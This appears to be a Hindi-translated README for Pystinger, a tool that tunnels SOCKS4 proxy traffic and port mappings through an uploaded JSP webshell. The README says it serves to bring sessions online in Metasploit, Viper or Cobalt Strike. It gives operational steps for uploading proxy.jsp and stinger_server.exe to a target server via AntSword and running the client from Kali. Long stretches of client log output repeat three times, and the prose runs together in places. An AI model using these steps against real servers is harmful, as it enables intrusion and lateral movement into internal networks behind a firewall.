
वेबशेल का उपयोग करके ट्रैफ़िक फ़ॉरवर्डिंग के लिए फ़ायरवॉल को बायपास करें
English | 简体中文
Pystinger वेबशेल के माध्यम से SOCK4 प्रॉक्सी और पोर्ट मैपिंग लागू करता है।
इसे सीधे metasploit-framework, viper, cobalt strike द्वारा सत्र ऑनलाइन करने के लिए उपयोग किया जा सकता है।
Pystinger python में विकसित किया गया है, और वर्तमान में तीन प्रॉक्सी स्क्रिप्ट का समर्थन करता है: php, jsp(x) और aspx।
मान लीजिए कि सर्वर का डोमेन नाम http://example.com :8080 है। सर्वर इंट्रानेट का आंतरिक IPAddress 192.168.3.11 है
proxy.jsp को लक्ष्य सर्वर पर अपलोड करें और सुनिश्चित करें कि http://example.com:8080/proxy.jsp तक पहुँचा जा सके, पेज UTF-8 लौटाता हैstinger_server.exe को लक्ष्य सर्वर पर अपलोड करें, AntSword में cmdstart D:/XXX/stinger_server.exe चलाकर pystinger-server प्रारंभ करेंसीधे D:/xxx/singer_server.exe न चलाएँ, इससे TCP कनेक्शन टूट जाएगा
./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 चलाएँroot@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
127.0.0.1:60000 पर example.com के इंट्रानेट के लिए एक socks4a प्रॉक्सी शुरू कर दिया है।example.com) के 127.0.0.1:60020 को VPS के 127.0.0.1:60020 पर मैप कर दिया गया हैproxy.jsp को लक्ष्य सर्वर पर अपलोड करें और सुनिश्चित करें कि http://example.com:8080/proxy.jsp तक पहुँचा जा सके, पेज UTF-8 लौटाता हैstinger_server.exe को लक्ष्य सर्वर पर अपलोड करें, AntSword में cmdstart D:/XXX/stinger_server.exe चलाकर pystinger-server प्रारंभ करेंसीधे
D:/xxx/singer_server.exeन चलाएँ, इससे TCP कनेक्शन टूट जाएगा
./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 चलाएँroot@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
60020 (आउटपुट के RAT CONFIG में Handler/LISTEN पोर्ट) है, लिसनर पता 127.0.0.1 हैproxy.jsp को लक्ष्य सर्वर पर अपलोड करें और सुनिश्चित करें कि http://example.com:8080/proxy.jsp तक पहुँचा जा सके, पेज UTF-8 लौटाता हैstinger_server.exe को लक्ष्य सर्वर पर अपलोड करें, AntSword में cmdstart D:/XXX/stinger_server.exe 192.168.3.11 चलाकर pystinger-server प्रारंभ करें (192.168.3.11 लक्ष्य का इंट्रानेट IP पता है)192.168.3.11 को 0.0.0.0 में बदला जा सकता है
./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 चलाएँroot@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 192.168.3.11:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 192.168.3.11:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
60020 (आउटपुट के RAT CONFIG में Handler/LISTEN पोर्ट) है, लिसनर पता 192.168.3.11 हैयदि वेबशेल को कुकी या प्राधिकरण कॉन्फ़िगर करने की आवश्यकता है, तो अनुरोध हेडर को --header पैरामीटर के माध्यम से कॉन्फ़िगर किया जा सकता है
--header "Authorization: XXXXXX,Cookie: XXXXX"
यदि वेबशेल को प्रॉक्सी के माध्यम से एक्सेस करने की आवश्यकता है, तो आप --proxy के माध्यम से प्रॉक्सी सेट कर सकते हैं
--proxy "socks5:127.0.0.1:1081"
2.0 अपडेट समय: 2019-09-29
2.1 अपडेट समय: 2020-01-07
यह विकास jetbrains के सॉफ्टवेयर द्वारा समर्थित है।
https://www.jetbrains.com/?from=pystinger